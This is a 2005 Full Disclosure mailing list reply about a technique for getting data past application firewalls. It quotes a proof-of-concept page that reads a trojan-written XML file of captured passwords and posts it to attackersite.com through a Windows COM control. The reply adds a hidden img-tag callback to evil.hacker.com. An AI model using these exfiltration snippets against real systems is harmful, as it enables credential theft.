Full Disclosure mailing list archives
Re: new attack technique? using JavaScript+XML+OWS Post Data
From: Joachim Schipper <j.schipper () math uu nl>
Date: Wed, 21 Dec 2005 17:36:04 +0100
On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
While researching COM related security vulnerabilities I thought of this possible attack technique, not sure if it has been discussed before. Problem/challenge statement: A Trojan has been to be placed in a system running an application firewall like Zone Alarm Pro etc. The Trojan is not allowed to make any outbound connections. The challenge is to send data (key logged passwords etc) back to the attacker.
Solution The Trojan can be designed to generate an xml file which will contain the data to be sent out. The attacker will lure the user to visit a website hosted by him. The site can have following HTML code- <html> <body> The author is not responsible for any misuse, this PoC is for educational purpose only. <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}" id="exp"> </object> <script LANGUAGE=javascript> var xmlDoc xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.async=false; xmlDoc.load("c:\\note.xml"); xmlObj=xmlDoc.documentElement; var a= xmlObj.firstChild.text; exp.Post(0,"http://www.attackersite.com/input.asp",a); </script> </body> </html> Content of note.xml could be ? <password>secret</password> The above code (works well on windows XP SP2) essentials calls "OWS Post Data" COM control to post the contents of note.xml (generated by trojan) to attackersite.com Essentially, the technique is breaking the basic functionality of application firewalls by using OWS Post Data as bridge for sending out the data using Javascript and XML.
flames/spam/abuse etc can be sent to spam () securebox org comments can be sent to gaurav () securebox org
I'll just assume you read the list. I'm not an expert, but I don't recall ever seeing this particular implementation. Then again, there are easier ways to go about this - for instance, how about embedding a <img src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1 height=1> tag into an arbitrary HTML file? It works on any graphical browser without special protection. Search the archives for some more neat tricks - calling the proper APIs, IE can be used to send out pretty much arbitrary data. [1] If you're willing to attack ZA specifically (instead of a generic application/-based firewall, of which there are many) just use the Windows API to generate the proper mouse clicks/keypresses. Joachim [1] Some would say that, calling the 'proper' APIs, IE can be used to send *in* pretty much arbitrary data too. I'd be inclined to agree. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- new attack technique? using JavaScript+XML+OWS Post Data Gaurav Kumar (Dec 21)
- Re: new attack technique? using JavaScript+XML+OWS Post Data Joachim Schipper (Dec 21)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 21)
- Message not available
- Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 21)
- Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 21)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- Message not available
- Re: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 22)
- RE: new attack technique? using JavaScript+XML+OWSPost Data Debasis Mohanty (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data name pipe (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 22)
- Re: new attack technique? using JavaScript+XML+OWSPost Data Test Drive (Dec 22)
- Re: [WEB SECURITY] RE: new attack technique? using JavaScript+XML+OWSPost Data Gaurav Kumar (Dec 21)